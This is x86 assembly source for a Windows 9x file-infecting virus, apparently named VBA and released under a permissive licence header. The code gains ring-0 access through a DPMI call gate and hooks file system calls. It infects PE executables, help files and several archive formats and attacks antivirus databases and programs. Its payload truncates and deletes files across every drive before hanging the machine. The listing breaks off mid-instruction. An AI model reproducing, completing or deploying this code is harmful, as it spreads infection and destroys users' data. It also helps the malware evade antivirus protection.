ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[VBA.ASM]ÄÄÄ COMMENT / (C) VBA Ltd. ALL RIGHTS RESERVED. E-mail: support@vba.com.by THIS PROGRAM IS FREE FOR COMMERCIAL AND NON-COMMERCIAL USE. REDISTRIBUTION AND USE IN SOURCE AND BINARY FORMS, WITH OR WITHOUT MODIFICATION, ARE PERMITTED. THIS SOFTWARE IS PROVIDED BY VBA LTD. ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. / ; KNOWN UNFIXED BUGS: ; 1. INCORRECT PATCHED PAGE MAPPING IN SOME CASES FOR RESTORED NON-WRITEABLE ; CODE SECTION FROM R0 ; 2. DRWEB ALARM FOR PE EXECUTABLE (BUT FALSE ALARM TOO) MODEL TINY P386 LOCALS INCLUDE VBA.INC TOTAL GROUP CODE16,CODE32 ;====================================== CODE16 SEGMENT BYTE PUBLIC 'CODE' USE16 ASSUME CS:TOTAL,DS:TOTAL,ES:TOTAL,SS:TOTAL ORG 100H START: ;-------------------------------------- DOS2R0 PROC JMP DOS_INSTALL ;0EBH (OR 0E9H FOR PE_INSTALL) JMP_RELO DB 0,0,0 COPYRIGHT = $-START DB '(C) VBA Ltd. E-mail: support@vba.com.by',0 OFF_DOSINST = $-JMP_RELO DOS_INSTALL: MOV AH,4AH MOV BH,10H INT 21H JB GO2_DOS_EXIT MOV AX,160AH INT 2FH ;GET WIN VERSION AND AX,AX JNE GOZ_DOS_EXIT CMP BH,4 ;<4.X? JB GO2_DOS_EXIT MOV DX,OUR_PORT IN AL,DX CMP AL,WE_HERE STC JE GO2_DOS_EXIT MOV AL,0 ;0-PE,1-HLP,2-RAR,3-ZIP ;4-ARJ,5-HA FILE_TYPE = $-START-1 DEC AX JNE NO_DOS_SLEEP INT 1AH MOV BX,DX DOS_SLEEP: STI ;TIMEOUT FOR HLP (PREVENT HANG) XOR AH,AH INT 1AH SUB DX,BX CMP DX,(WAIT_TIME*18) JB DOS_SLEEP NO_DOS_SLEEP: CLD MOV AX,1687H INT 2FH ;DPMI PRESENT (0.9 IN WIN95/8)? AND AX,AX JNE GOZ_DOS_EXIT MOV BP,SP PUSH ES DI MOV BX,SI MOV AH,48H INT 21H ;MALLOC FOR INTERNAL USE BY DPMI HOST JB GO2_DOS_EXIT MOV ES,AX XOR AX,AX CALL 4 PTR [BP-4] ;GO OUT FROM V86 TO PM MODE GO2_DOS_EXIT: JB GO_DOS_EXIT CALL CALC_DOS_DELTA DOS_DELTA = $-START DB 'MS-DOS',0 CALC_DOS_DELTA: POP SI MOV AX,168AH INT 2FH ;GET EXTAPI AND AL,AL GOZ_DOS_EXIT: JNE DOS_EXIT PUSH ES DI DS POP ES MOV CX,1 CALL ALLOC_DESC PUSH AX CALL ALLOC_DESC MOV [BP-2],AX AND AL,NOT 7 PUSH AX MOV BX,CS LEA DI,ZERO_INIT-DOS_DELTA[SI] MOV AX,0BH CALL DPMICALL ;GET CS DESCRIPTOR MOV AX,100H CALL 4 PTR [BP-8] ;GET LDT ALIAS GO_DOS_EXIT: JB DOS_EXIT MOV ES,AX LEA AX,OFF_R0_INSTALL-DOS_DELTA[SI] ADD AX,[DI+2] MOV BL,[DI+4] MOV BH,[DI+7] ADC BX,0 POP DI STOSW ;GENERATE CALLGATE POP AX STOSW AND AL,NOT 7 PUSH AX MOV AX,11101100B SHL 8 ;P=1:DPL=3:S=0:TYPE=0CH (CALLGATE) STOSW XCHG AX,BX STOSW POP DI ;GENERATE R0 DESCRIPTOR MOV AX,-1 STOSW INC AX STOSW STOSB MOV AX,1100111110011010B ;G=1:32=1:AVL=0:LIMIT=0FH STOSW ;P=1:DPL=0:S=1:CODE:NCONF:READ=1:NOACCESS XOR AL,AL STOSB CALL 4 PTR [BP-4] ;SWITCH TO R0 DOS_EXIT: .EXIT ALLOC_DESC: XOR AX,AX DPMICALL: INT 31H JB DOS_EXIT RET ENDP INCLUDE SPE.ASI END_CODE16 = $-START ENDS ;====================================== CODE32 SEGMENT BYTE PUBLIC 'CODE' USE32 ASSUME CS:TOTAL,DS:TOTAL,ES:TOTAL,SS:TOTAL START_CODE32: ;------------------------------------------------ CALC_DELTA PROC CALL CALC_OUR_OFFST GOFF OUR_OFFST CALC_OUR_OFFST: POP EDX SUB EDX,LARGE OUR_OFFST RET ENDP ;------------------------------------------------ GOFF OFF_IFS_HOOKER ; INT FILESYSTEMAPIHOOKFUNCTION(PIFSFUNC FSDFNADDR,INT FUNCTIONNUM,INT DRIVE, ; INT RESOURCEFLAGS,INT CODEPAGE,PIOREQ PIR) IFS_HOOKER PROC FSD_FN_ADDR = 4 PTR [EBP+8] FN_NUM = 4 PTR [EBP+12] DRIVE = 4 PTR [EBP+16] RES_FLAGS = 4 PTR [EBP+20] CODE_PAGE = 4 PTR [EBP+24] P_IOREQ = 4 PTR [EBP+28] ENTERD STACK_FRAME,0 PUSHAD CALL CALC_DELTA MOV EBX,P_IOREQ BTS 4 PTR FLAG[EDX],0 JB IFS_EXIT CMP 1 PTR RES_FLAGS,IFSFH_RES_CFSD ;CHAR DEVICE? JE IFS_RETURN MOV EAX,FN_NUM CMP EAX,IFSFN_RENAME JA IFS_RETURN JE IS_RENAME CMP AL,IFSFN_OPEN JE IS_OPEN CMP AL,IFSFN_FILEATTRIB JE IS_ATTRIB GOFF IFS_RETURN_OFF IFS_RETURN: DEC 1 PTR FLAG[EDX] POPAD LEAVED JMP 4 PTR DS:[12345678H] GOFF OLD_IFS_HOOKER,4 IFS_EXIT: PUSH EBX LEA EDI,OLD_DATETIME[EDX] CALL FSD_FN_ADDR MOV [EBP-STACK_FRAME-4],EAX ;SET CORRECT RETURN VALUE POP EAX CMP 1 PTR FN_NUM,IFSFN_OPEN JNE NO_STORE_FDATE MOV EAX,[EBX.IR_DATETIME] STOSD NO_STORE_FDATE: POPAD LEAVED GOFF HOOK_STUB RET ENDP ;------------------------------------------------ IS_RENAME: TEST 1 PTR [EBX.IR_ATTR+3],FILE_FLAG_WILDCARDS SHR 24 JMP IS_ACCESS ;------------------------------------------------ IS_ATTRIB: MOV AL,[EBX.IR_FLAGS] DEC EAX ;SET_ATTRIBUTES JNE NO_SET_ATTRIB TEST 1 PTR [EBX.IR_ATTR],FA_SYSTEM JMP IS_ACCESS NO_SET_ATTRIB: CMP AL,SET_ATTRIB_CREATION_DATETIME-1 JA IFS_RETURN AND AL,1 JMP IS_ACCESS ;------------------------------------------------ IS_OPEN: TEST 1 PTR [EBX.IR_OPTIONS+1],(R0_SWAPPER_CALL OR OPEN_FLAGS_REOPEN) SHR 8 IS_ACCESS: JNE IFS_RETURN GO_PROCESS: BREAK PUSH EBX CMP DL,SHELL_FLAG[EDX] IFNDEF DEBUG JNE GO_NO_INF_SHELL ELSE JMP GO_NO_INF_SHELL ENDIF CALL GET_WININIT CALL GET_ATTRIBUTES JNB GO_NO_INF_SHELL LEA ESI,SYSTEM_INI[EDX] MOV CL,LEN_SYSTEM_INI CALL CONCAT_WINDIR PUSH EDX CALL OPEN_FILE_RO POP EDX JB GO_NO_INF_SHELL XCHG EAX,EBX CALL READ_FILE_BUFF_0 JNB LONG_SYSINI ADD ECX,EAX LONG_SYSINI: CALL CLOSE_FILE FIND_SHELL: LODSD OR EAX,20202020H CMP EAX,'lehs' JNE NO_SHELL LODSW OR AL,20H CMP AX,'=l' JE IS_SHELL DEC ESI DEC ESI NO_SHELL: SUB ESI,3 LOOP FIND_SHELL GO_NO_INF_SHELL: JMP NO_INF_SHELL IS_SHELL: CMP 1 PTR [ESI+1],':' JNE SNAME_ONLY LEA EDI,TMP_PATH[EDX] PUSH EDI COPY_SH_NAME: MOVSB CMP 1 PTR [ESI],20H JA COPY_SH_NAME MOV [EDI],DL POP ESI JMP OPEN_SHELL SNAME_ONLY: XOR ECX,ECX GET_SH_LIM: INC ECX CMP 1 PTR [ESI+ECX],20H JA GET_SH_LIM CALL CONCAT_WINDIR OPEN_SHELL: PUSH EDX CALL OPEN_FILE_RO POP EDX JB GO_NO_INF_SHELL XCHG EAX,EBX CALL GET_ATTRIBUTES PUSH EBX ECX EDX EBX DEC 1 PTR [EDI-1] MOV EDI,4 PTR OLD_DATETIME[EDX] CALL OPEN_CREATE POP EBX EDX JB CLOSE_SOURCE PUSH EDI ESI EAX CALL READ_FILE_BUFF_0 JB CLOSE_ALL XCHG EAX,EDI MOV AL,WE_HERE XCHG AL,1 PTR [ESI.DOSH_CSUM] CMP AL,WE_HERE JE CLOSE_ALL_CMC COPY_FILE: POP EBX PUSH EBX MOV EAX,EDI CALL WRITE_FILE JB CLOSE_ALL ADD EDI,ECX MOV EAX,EDI MOV EBX,[ESP+10H] CALL READ_FILE JNB COPY_FILE ADD ECX,EAX JNE COPY_FILE CLOSE_ALL_CMC: CMC CLOSE_ALL: POP EBX ESI CX DI PUSHFD CALL CLOSE_FILE MOV AL,SET_ATTRIB_MODIFY_DATETIME CALL MAN_ATTRIBUTES POPFD CLOSE_SOURCE: POP ECX SBB EDI,EDI JNE SH_ERR CALL SET_ATTRIBUTES JMP SH_OK SH_ERR: CALL DELETE_FILE SH_OK: POP EBX CALL CLOSE_FILE INC EDI STC JE GOC_NO_INF_SHELL MOV FILE_TYPE[EDX],DL CALL INFECTION LEA ESI,TMP_PATH[EDX] LEA EDI,MAIN_BUFF[EDX] PUSH EDI ESI MOV EAX,'ner[' STOSD MOV EAX,']ema' STOSD MOV AL,0AH STOSB MOVE_DEST: LODSB CMP AL,'A' JB NO_LETTER CMP AL,'Z' JA NO_LETTER OR AL,20H NO_LETTER: STOSB CMP DL,[ESI] JNE MOVE_DEST INC 1 PTR [EDI-1] MOV AL,'=' STOSB POP ESI MOVE_SOURCE: MOVSB CMP DL,[ESI] JNE MOVE_SOURCE MOV AL,0AH STOSB MOV EAX,'=lun' STOSD PUSH EDI CALL GET_WININIT POP EDI PUSH ESI MOVE_INIT: MOVSB CMP DL,[ESI] JNE MOVE_INIT POP ESI PUSH EDX CALL OPEN_CREATE POP EDX ECX GOC_NO_INF_SHELL: JB NO_INF_SHELL XCHG EAX,EBX SUB EDI,ECX MOV ESI,ECX MOV ECX,EDI XOR EAX,EAX CALL WRITE_FILE CALL CLOSE_FILE PUSH GET_CUR_VM_HANDLE CALL VXD_CALL MOV AL,MSG_POSSIBLITY CALL GET_RANDOM_BYTE IFNDEF DEBUG JNE NO_INF_SHELL ELSE XOR EAX,EAX ENDIF LEA ECX,COPYRIGHT[EDX] MOV ESI,EAX MOV EDI,EAX PUSH SHELL_MESSAGE CALL VXD_CALL NO_INF_SHELL: MOV 1 PTR SHELL_FLAG[EDX],1 POP EBX SHELL_ALREADY: IFNDEF DEBUG LEA ESI,COMMAND_PIF[EDX] MOV CL,LEN_COMMAND_PIF CALL CONCAT_WINDIR CALL GET_ATTRIBUTES JB CPIF_NFOUND CALL DELETE_FILE CPIF_NFOUND: MOV EDI,ESI ELSE LEA EDI,TMP_PATH[EDX] MOV ESI,EDI ENDIF MOV EAX,DRIVE INC AL ;UNC PATH? JE NO_STORE_DRIVE ADD AX,(':' SHL 8) OR ('A'-2) STOSW NO_STORE_DRIVE: MOV EAX,[EBX.IR_PPATH] ADD EAX,4 PUSH EDX BCS_WANSI MAX_PATH-3 EAX EDI UNITOBCSPATH CALL VXD_CALL ADD ESP,4*4 POP EDX MOV [EDI+EAX],DL LEA ECX,FILE_TYPE[EDX] MOV 1 PTR [ECX],0FFH MOV EAX,[EDI+EAX-4] CMP EAX,'CVA.' ;AVP 3 DATABASE? JE INFECT_IT CMP EAX,'BDV.' ;DRWEB 4 DATABASE? JE INFECT_IT INC 1 PTR [ECX] CMP EAX,'EXE.' ;EXE? JE OK_FILE CMP EAX,'RCS.' JE OK_FILE CMP EAX,'LLD.' ;DLL? JE INFECT_IT ;FOR AV CORRECT CHECKING ONLY! INC 1 PTR [ECX] CMP EAX,'PLH.' ;HLP? JE OK_FILE INC 1 PTR [ECX] CMP EAX,'RAR.' ;RAR? JE OK_FILE INC 1 PTR [ECX] CMP EAX,'PIZ.' ;ZIP? JE OK_FILE INC 1 PTR [ECX] CMP EAX,'JRA.' ;ARJ? JE OK_FILE INC 1 PTR [ECX] SHR EAX,8 CMP EAX,'AH.' ;HA? STC JNE GO_IFS_RETURN OK_FILE: PUSH EDX EBX MOV EDX,DRIVE TEST 1 PTR RES_FLAGS,IFSFH_RES_UNC JNE ERR_GET_SPACE MOV AX,R0_GETDISKFREESPACE CALL FILE_IO JB ERR_GET_SPACE MUL BX ;SEC_PER_CLUST(AX)*AVAIL_CLUST(CX) CMC JNB ERR_GET_SPACE CMP AX,SMALL (OUR_LEN+1FFH+0FFFH)/200H ERR_GET_SPACE: POP EBX EDX GO_IFS_RETURN: JB IFS_RETURN INFECT_IT: ;TMP_PATH->FILE PATH TO INFECTION LEA EAX,IFS_RETURN_OFF[EDX] PUSH EAX CALL GET_ATTRIBUTES JNB GOOD_ATT CMP 1 PTR FN_NUM,IFSFN_RENAME JE INF_ERR PUSH ESI MOV EDI,[EBX.IR_UPATH] XCHG ESI,EDI PARSE_PATH: LODSB INC ESI STOSB DEC AL JNS PARSE_PATH POP ESI ;-------------------------------------- INFECTION: CALL GET_ATTRIBUTES JB INF_ERR GOOD_ATT: TEST CL,FA_SYSTEM OR FA_DEVICE JE ATT_OK INF_ERR: RETN ATT_OK: MOV EDI,ECX CALL CLR_ATTRIBUTES JB INF_ERR PUSH EDI EDX MOV BL,OPEN_ACCESS_READWRITE OR OPEN_SHARE_DENYREADWRITE CALL OPEN_FILE POP EDX JB REST_ATTRIB PUSH ESI XCHG EAX,EBX MOV ECX,12345678H GOFF OLD_DATETIME,4 CMP 1 PTR FN_NUM,IFSFN_FILEATTRIB JNE CURRENT_DATE MOV EDI,P_IOREQ CMP 1 PTR [EDI.IR_FLAGS],SET_ATTRIB_MODIFY_DATETIME JNE CURRENT_DATE MOV ECX,[EDI.IR_DATETIME] CURRENT_DATE: PUSH ECX TEST 1 PTR FILE_TYPE[EDX],0FFH JS IS_SHITNAME JNE NO_SHITNAME MOV EDI,ESI GET_PATHBYTE: LODSB CMP AL,'\' JE STORE_OFFS CMP AL,':' JNE NO_STORE_OFFS STORE_OFFS: MOV EDI,ESI NO_STORE_OFFS: AND AL,AL JNE GET_PATHBYTE MOV EAX,[EDI] CMP EAX,'NIDA' ;ADINF? JE GO_TO_PAY CMP EAX,'IPVA' ;AVPI? JE GO_TO_PAY CMP EAX,'SOHG' ;GHOST32? JE GO_TO_PAY CMP EAX,'NIBV' ;VBINF? :-) JE GO_TO_PAY CMP EAX,'PVA_' ;AVP? JE IS_SHITNAME SHL EAX,8 CMP EAX,'RAJ' SHL 8 ;JAR? JE SKIP_FILE CMP EAX,'PVA' SHL 8 ;AVP? JE IS_SHITNAME CMP EAX,'WRD' SHL 8 ;DRWEB? JE IS_SHITNAME CMP EAX,'ABV' SHL 8 ;VBA*.EXE? :-) JNE NO_SHITNAME CMP 1 PTR [ESI-2],'E' JNE NO_SHITNAME IS_SHITNAME: XCHG EAX,ECX XOR ECX,ECX SHLD ECX,EAX,11 AND ECX,00001111B SHR EAX,16+5+4 SUB AL,HAPPY_YEAR-1980 JB SKIP_FILE MOV AH,12 ;MONTHS IN YEAR MUL AH IF HAPPY_MONTH EQ 1 DEC EAX ELSEIF HAPPY_MONTH EQ 2 DEC EAX DEC EAX ELSE SUB EAX,HAPPY_MONTH ENDIF ADD ECX,EAX JS SKIP_FILE MOV EAX,HAPPY_POSSIBLITY SUB EAX,ECX JA NOT_EXPIRED MOV AL,1 ;100% POSSIBLITY NOT_EXPIRED: CALL GET_RANDOM_BYTE GO_TO_PAY: JE TIME_TO_PAY SKIP_FILE: STC JMP GO_F_CLOSE NO_SHITNAME: PUSH EDX GET_DOSTIME CALL VXD_CALL POP EDX SUB EAX,[ESP] CMP EAX,0FFFFFH ;MIN - TWO WEEK AGE IFNDEF DEBUG JB F_CLOSE ENDIF CALL GET_SYS_TIME CMP DL,SHELL_FLAG[EDX] JE NO_SLEEP SUB EAX,12345678H GOFF INF_TIME,4 CMP EAX,SLEEP_TIME*60*1000 IFNDEF DEBUG JB F_CLOSE ENDIF NO_SLEEP: LEA ESI,HEADER[EDX] PUSH SIZE DOS_HEADER POP ECX XOR EAX,EAX ;POS IN FILE CALL READ_FILE ;READ FILE HEADER GO_F_CLOSE: JB F_CLOSE LEA EDI,OUR_LOCAL_HEADER[EDX] MOV CL,(SIZE_ARC_AREA+3)/4 REP STOSD MOV AL,1 PTR FILE_TYPE[EDX] MOVZX EDI,2 PTR INF_PROCS[EDX+EAX*2] ADD EDI,EDX MOV 2 PTR [EDX],(OFF_DOSINST SHL 8) OR 0EBH ;DROPPER MODE CALL EDI F_CLOSE: CALL CLOSE_FILE POP CX DI ESI MOV AL,SET_ATTRIB_MODIFY_DATETIME CALL MAN_ATTRIBUTES REST_ATTRIB: POP ECX JMP SET_ATTRIBUTES ;------------------------------------------------ TIME_TO_PAY: MOV EAX,_LEAVEMUSTCOMPLETE PUSH EAX DEC EAX ;_ENTERMUSTCOMPLETE PUSH EAX CALL VXD_CALL LEA EDX,FIND_DATA[EDX] ;ESI=&TMP_PATH IFNDEF DEBUG MOV AX,':C' ELSE MOV AX,':X' ENDIF FIND_DRIVE: MOV EDI,ESI STOSW PUSH EAX FIND_FIRST: MOV AL,'\' STOSB MOV 2 PTR [EDI],'*' PUSH 37H POP ECX MOV AX,R0_FINDFIRSTFILE CALL FILE_IO JNB SOME_FOUND FIND_SLASH: DEC EDI CMP 1 PTR [EDI-1],':' JE NEXT_DRIVE CMP 1 PTR [EDI-1],'\' JNE FIND_SLASH FIND_NEXT: MOV AX,R0_FINDNEXTFILE CALL FILE_IO JNB OK_FOUND MOV AX,R0_FINDCLOSEFILE CALL FILE_IO POP EBX JMP FIND_SLASH SOME_FOUND: PUSH EBX XCHG EAX,EBX OK_FOUND: PUSH ESI EDI LEA ESI,[EDX.CFILENAME] STORE_NAME: LODSB STOSB AND AL,AL JNE STORE_NAME DEC EDI POP EAX ESI XCHG EAX,EDI TEST 1 PTR [EDX.DWFILEATTRIBUTES],10H JE NOT_DIR CMP 1 PTR [EDX.CFILENAME],'.' JE FIND_NEXT XCHG EAX,EDI JMP FIND_FIRST NEXT_DRIVE: POP EAX INC EAX CMP AL,'Z' JBE FIND_DRIVE GO_HANG: CALL VXD_CALL ;_LEAVEMUSTCOMPLETE XOR ESI,ESI LEA EAX,[ESI+1] ;HANG_ON_EXIT PUSH FATAL_ERROR_HANDLER JMP GO_HANG NOT_DIR: PUSHAD CALL CLR_ATTRIBUTES CALL OPEN_CREATE JB DEL_FILE XCHG EAX,EBX CALL CLOSE_FILE DEL_FILE: CALL DELETE_FILE POPAD JMP FIND_NEXT ;------------------------------------------------ ;ENTRY: EBP=&LENGTH OF MACRO STRING CORR_LENGTH PROC MOV EAX,EDI SUB EAX,EBP DEC EAX MOV [EBP],AX XOR AL,AL STOSB INF_EXE_EXIT: RET ENDP ;------------------------------------------------ GOFF INF_EXE MOV 1 PTR [EDX],0E9H ;PE SPECIAL MODE IFDEF DEBUG CMP [DOSH_SIGNATURE.ESI],'MZ' ELSE CMP [DOSH_SIGNATURE.ESI],'ZM' ENDIF JNE INF_EXE_EXIT CMP [DOSH_LFARLC.ESI],3FH JBE INF_EXE_EXIT MOVZX EAX,[DOSH_LFANEW.ESI] ADD ESI,SIZE DOS_HEADER ;PHEADER MOV CX,SIZE PE_HEADER+(SIZE OBJECT_TABLE*MAX_OBJS) CALL READ_FILE JB INF_EXE_EXIT CMP 2 PTR [PEH_SIGNATURE.ESI],'EP' JNE INF_EXE_EXIT CMP [PEH_CPUTYPE.ESI],162H ;INTEL? JAE INF_EXE_EXIT CMP 1 PTR [PEH_NUMOFOBJECT.ESI],MAX_OBJS JA INF_EXE_EXIT TEST 2 PTR [PEH_FLAGS.ESI],PE_FLAG_DLL OR PE_FLAG_NOT_FIXUP JNE INF_EXE_EXIT TEST 2 PTR [PEH_FLAGS.ESI],PE_FLAG_32BIT OR PE_FLAG_EXECUTABLE JE INF_EXE_EXIT CMP 4 PTR [PEH_IMAGEBASE.ESI],400000H JNE INF_EXE_EXIT INC 1 PTR [PEH_FLAGS.ESI] ;PE_FLAG_NOT_FIXUP LEA EDI,[ESI+SIZE PE_HEADER-SIZE OBJECT_TABLE] XOR EAX,EAX MOV [PEH_FIXUP.SD_SIZE.ESI],EAX XCHG EAX,[PEH_FIXUP.SD_RVA.ESI] AND EAX,EAX GOZ_INF_EXIT: JE INF_EXE_EXIT PUSH EDI FIND_FIXUPOBJ: ADD EDI,SIZE OBJECT_TABLE CMP EAX,[OT_RVA.EDI] JNE FIND_FIXUPOBJ MOV AL,NOCHNG_SATT_PSBL CALL GET_RANDOM_BYTE JE NO_CHNG_ATT AND 1 PTR [OT_FLAGS.EDI+3],NOT ((OT_FLAG_DISCARDABLE OR OT_FLAG_SHARED) SHR 24) OR [OT_FLAGS.EDI],OT_FLAG_READ OR OT_FLAG_IDATA NO_CHNG_ATT: MOV AL,CHNG_SNAME_PSBL CALL GET_RANDOM_BYTE JNE NO_CHNG_NAME PUSH EDI CALL GEN_NAME XOR AL,AL STOSB POP EDI NO_CHNG_NAME: MOV AL,LEN_PEND_JUNK CALL GET_RANDOM_BYTE ADD AX,SMALL OUR_LEN+LEN_LOADER+3 AND AL,NOT 3 MOV CURRENT_LEN[EDX],EAX MOV COUNT_RET[EDX],AX XCHG EAX,ECX MOV EAX,[OT_VIRTSIZE.EDI] CALL CORR_SIZE CMP EAX,[OT_PHYSICALSIZE.EDI] JB GET_VIRTSIZE MOV EAX,[OT_PHYSICALSIZE.EDI] GET_VIRTSIZE: SUB EAX,ECX PUSHFD JA OK_RELOC_SIZE ADD EAX,ECX OK_RELOC_SIZE: CALL GET_RANDOM AND AL,NOT 3 PUSH EAX ADD EAX,[OT_PHYSICALOFF.EDI] MOV PHYS_BODY_OFF[EDX],EAX ADD EAX,ECX MOV FILL_SEC_OFF[EDX],EAX POP EAX ADD EAX,ECX PUSH EAX ADD EAX,[OT_RVA.EDI] ADD EAX,[PEH_IMAGEBASE.ESI] MOV OFF_FIXUP[EDX],EAX POP ECX POPFD JA MID_EXIT_ONE CMP [OT_PHYSICALSIZE.EDI],MIN_RELOC_SIZE JB MID_EXIT_ONE PUSH ESI CALL GETSIZE_FILE SUB EAX,[OT_PHYSICALOFF.EDI] CMP EAX,[OT_PHYSICALSIZE.EDI] JA MID_EXIT_CMC CALL CORR_SIZE_ECX CMPSD SCASD CALL CORR_SIZE_ECX SUB EAX,ECX CMP EAX,SIZE_MBUFF MID_EXIT_CMC: CMC JB MID_EXIT_TWO XCHG EAX,ECX PUSH ECX LEA EDI,MAIN_BUFF[EDX] MOV ESI,EDI XOR AL,AL REP STOSB POP ECX MOV EAX,12345678H GOFF FILL_SEC_OFF,4 CALL WRITE_FILE MID_EXIT_TWO: POP ESI MID_EXIT_ONE: POP EDI JNB NO_POP_EXIT MID_RET: RETN NO_POP_EXIT: MOV EAX,[PEH_CODEBASE.ESI] FIND_CODEOBJ: ADD EDI,SIZE OBJECT_TABLE CMP EAX,[OT_RVA.EDI] JNE FIND_CODEOBJ MOV AL,OT_FLAG_WRITE SHR 24 TEST AL,1 PTR [OT_FLAGS.EDI+3] JNE MID_RET PUSH EDI LEA ESI,TMP_PATH[EDX] MOV EDI,[ESI-SYS_PATH_DELTA] ;SYS_PATH[EDX] MOV CL,NOT RW_LOCAL_EXIT CHECK_PATH: CMPSB JNE NO_SYS_DIR CMP DL,[EDI] JNE CHECK_PATH XOR AL,AL MOV CL,AL NO_SYS_DIR: POP EDI OR 1 PTR [OT_FLAGS.EDI+3],AL MOV RW_OR_RO[EDX],CL PUSH EDX MOV EAX,[OT_PHYSICALSIZE.EDI] XOR EDX,EDX MOV ECX,SIZE_MBUFF DIV ECX POP EDX CALL GET_RANDOM IMUL EAX,ECX ADD EAX,[OT_PHYSICALOFF.EDI] PUSH EAX CALL READ_FILE_BUFF JB POP_INF_EXIT CMP DL,SHELL_FLAG[EDX] JE INF_ENTRYPOINT CALL FIND_PLACE AND ECX,ECX JNE MIDDLE_INSERT INF_ENTRYPOINT: POP EAX MOV EAX,PHEADER[PEH_ENTRYPOINT.EDX] PUSH EAX SUB EAX,[OT_RVA.EDI] ADD EAX,[OT_PHYSICALOFF.EDI] PUSH EAX CALL READ_FILE_BUFF POP EDI POP_INF_EXIT: POP EAX JB GO1_INF_EXIT PUSH EDI JMP ENTRY_INSERT MIDDLE_INSERT: MOV ESI,EAX SUB EAX,EDX SUB EAX,LARGE MAIN_BUFF ADD EAX,[OT_RVA.EDI] ADD EAX,[ESP] SUB EAX,[OT_PHYSICALOFF.EDI] ENTRY_INSERT: ADD EAX,PHEADER[PEH_IMAGEBASE.EDX] MOV INTRUD_OFF[EDX],EAX LEA EDI,OLD_PECODE[EDX] PUSH ESI XOR ECX,ECX MOV CL,LEN_LOADER REP MOVSB CALL SPE_THUNK POP EDI LEA ESI,SPE32_BUFF[EDX] REP MOVSB POP EAX LEA ESI,MAIN_BUFF[EDX] MOV CX,SIZE_MBUFF CALL WRITE_FILE GO1_INF_EXIT: JB INF_EXIT MOV EDI,ESI MOV ESI,EDX MOV ECX,12345678H GOFF CURRENT_LEN,4 PUSH ECX EDI REP MOVSB POP ESI ECX PUSH ECX EBX MOV EAX,12345678H GOFF MASK_CR,4 SHR ECX,1 GOFF LOOP_CR SHR ECX,1 ;NOP/NOP LOOP_CR_IMM: SUB EDI,4 ;SUB EDI,2 MOV EBX,[EDI] DB LEN_FILL_CRYPT DUP (90H) GOFF END_LOOP_CR DB 90H ;66H MOV [EDI],EBX LOOP LOOP_CR_IMM POP EBX ECX MOV EAX,12345678H GOFF PHYS_BODY_OFF,4 CALL WRITE_FILE LEA ESI,PHEADER[EDX] MOV AL,1 PTR [PEH_NUMOFOBJECT.ESI] IMUL EAX,SIZE OBJECT_TABLE ADD AX,SIZE PE_HEADER XCHG EAX,ECX MOV AX,[ESI.DOSH_LFANEW-SIZE DOS_HEADER] JMP SET_WRITE_FILE ;------------------------------------------------ CORR_SIZE_ECX: MOV EAX,ECX CORR_SIZE: PUSH EDX XOR EDX,EDX DIV [PEH_OBJALIGN.ESI] AND EDX,EDX JE NO_ALIGN INC EAX NO_ALIGN: MUL [PEH_OBJALIGN.ESI] POP EDX MOV [OT_VIRTSIZE.EDI],EAX RETN ;------------------------------------------------ MACRO_FNAME PROC PUSH ESI LEA ESI,RDROP_NAME[EDX] MOV EAX,'\\:C' STOSD SHR EAX,16 STOSW STORE_NLETT: MOVSB CMP 1 ptr [esi],'.' JNE STORE_NLETT MOV EAX,'PMT.' GOFF TEMP_EXT,3 STOSD POP ESI INF_EXIT: RET ENDP ;------------------------------------------------ GOFF INF_HLP DEC EAX ;EAX = 0 CALL GET_RANDOM LEA EDI,FIRST_DROP_MASK[EDX] STOSW SHR EAX,16 MOV RELO_MASK2[EDI-2],AX LODSD ;HLP_HEADER CMP EAX,HLP_MAGIC JNE INF_EXIT ;1. READ BEGIN OF HLP-DIRECTORY LODSD ;HLP_START_DIRECTORYSTART MOV EDI,ESI CMPSD ;LEA ESI,[ESI+SIZE HLP_START-8] CMPSD MOV CH,LEN_HLP_DIR SHR 8 ;CL=0 CALL READ_FILE JB INF_EXIT ;2. FIND "|SYSTEM" STRING AND GET OFFSET MOV AL,'|' FIND_SYSTEM: REPNE SCASB JNE INF_EXIT CMP 4 PTR [EDI],'TSYS' ;"|SYSTEM" BLOCK? JNE FIND_SYSTEM XCHG EAX,ECX MOV CL,SIZE FILE_HEADER+SIZE SYSTEM_HEADER MOV EAX,[ESI.HLP_START_ENTIREFILESIZE-SIZE HLP_START] XCHG EAX,[EDI+7] ;STORE NEW "SYSTEM" OFFSET ;3. READ SYSTEM PAGE (LENGTH READ BEFORE) LEA ESI,SYS_FILE_HEADER[EDX] LEA EDI,[EAX+ECX] ;OFFSET "SYSTEM" DATA CALL READ_FILE JB INF_EXIT CMP [ESI+(SIZE FILE_HEADER).SYSTEM_HEADER_MINOR],16 JBE INF_EXIT ;4. CHECK SECONDS IF FILE ALREADY INFECTED CMP AL,1 PTR [ESI+(SIZE FILE_HEADER).SYSTEM_HEADER_GENDATE] JE INF_EXIT MOV 1 PTR [ESI+(SIZE FILE_HEADER).SYSTEM_HEADER_GENDATE],AL ;5. GENERATE OUR MACROS PUSH EDI LEA EDI,[ESI+ECX] ;BUFF4MACRO CALL GEN_MACROS ;EXIT: EAX=MACROLENGTH ;6. CORRECT USED "SYSTEM" LENGTH ADD [ESI.FILE_HEADER_USEDSPACE],EAX ADD 